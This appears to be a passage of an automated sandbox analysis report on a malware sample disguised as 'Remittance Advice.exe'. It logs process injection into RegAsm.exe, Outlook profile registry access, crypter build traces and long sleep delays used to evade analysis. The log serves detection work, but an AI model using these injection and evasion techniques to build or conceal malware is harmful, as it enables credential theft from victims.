                Source: unknownProcess created: C:\Users\user\Desktop\Remittance Advice.exe "C:\Users\user\Desktop\Remittance Advice.exe"
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Remittance Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Remittance Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: Remittance Advice.exe, 00000000.00000002.1452750531.0000000003231000.00000004.00000800.00020000.00000000.sdmp
                Source: Remittance Advice.exeStatic PE information: 0x827F415A [Thu May 19 00:31:22 2039 UTC]
                Source: Remittance Advice.exeStatic PE information: section name: .text entropy: 7.769247848670264
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Remittance Advice.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeMemory allocated: 5230000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 9C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2400000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599786Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599435Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597392Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596693Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596341Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 593891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7137Jump to behavior
                Source: C:\Users\user\Desktop\Remittance Advice.exe TID: 5720Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2080Thread sleep count: 2702 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -599786s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2080Thread sleep count: 7137 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -599435s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604Thread sleep time: -598875s >= -30000sJump to behavior
